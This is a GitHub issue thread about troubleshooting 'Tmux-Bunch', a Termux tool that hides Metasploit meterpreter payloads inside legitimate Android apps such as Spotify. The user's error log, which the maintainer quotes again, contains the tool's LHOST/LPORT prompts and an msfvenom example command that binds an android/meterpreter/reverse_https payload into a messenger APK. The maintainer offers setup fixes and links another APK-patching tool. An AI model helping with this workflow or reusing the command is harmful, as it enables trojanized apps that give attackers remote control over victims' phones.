### ISSUE TITLE
Not binding 

### ISSUE THREAD

**Issue by roanokee** [ng1nX4O4/Tmux-Bunch#1]
which file ? Enter number of choice or 'x' to exit
1
 [*] Please enter following details :-
 [*] LHOST :-
localhost
 [*] LPORT :-
4446
 [*] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP
spotify

 [*] Please wait while binding.......🕜

Using APK template: /data/data/com.termux/files/home/Tmux-Bunch/binder/Spotify
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[-] Usage: /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x [target.apk] [msfvenom options]
[-] e.g. /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
Error: Invalid template: /data/data/com.termux/files/home/Tmux-Bunch/binder/Spotify

 We will met again :D , have a payload day..! 📢

 press ENTER for main menu

**Comment by roanokee** [comment]
I'm also getting this Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/ubuntu/ubuntu-fs/root/.bind/original/AndroidManifest.xml

**Comment by ng1nX4O4** [comment]
Have You Tried To Setup

**Comment by ng1nX4O4** [comment]
Use This Command To Setup Again
`rm -rf $PREFIX/ubuntu`
`bash Tmux-Bunch/setup`

Or You Can Try This Tool


http://github.com/ng1nX4O4/PatchApk

**Comment by roanokee** [comment]
Yes I ran it before I did anything

**Comment by roanokee** [comment]
Should I uninstall and try again ?

**Comment by ng1nX4O4** [comment]
Type `ubuntu` and Send Me The ScreenShot
if You Get The Ubuntu Shell Then It's Working Fine Or Else You Haven't Installed It Correctly

**Comment by ng1nX4O4** [comment]
messege me on facebook

http://www.facebook.com/ng1nX4O4

**Comment by ng1nX4O4** [comment]
Try Binding Other Apk

**Comment by ng1nX4O4** [comment]
> which file ? Enter number of choice or 'x' to exit
> 1
> [_] Please enter following details :- [_] LHOST :-
> localhost
> [_] LPORT :- 4446 [_] ENTER THE NAME YOU WANT TO GIVE FOR THE FINAL APP
> spotify
> 
> [*] Please wait while binding.......
> 
> Using APK template: /data/data/com.termux/files/home/Tmux-Bunch/binder/Spotify
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [-] Usage: /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x [target.apk] [msfvenom options]
> [-] e.g. /data/data/com.termux/files/usr/opt/metasploit-framework/msfvenom -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
> Error: Invalid template: /data/data/com.termux/files/home/Tmux-Bunch/binder/Spotify
> 
> We will met again :D , have a payload day..! 
> 
> press ENTER for main menu

**Comment by ng1nX4O4** [comment]
Please Give Me More Information

**Comment by ng1nX4O4** [comment]
Give Me ScreenShot Of This Commands
`apktool --version`
`java --version`
`ubuntu ls /root/.bind`
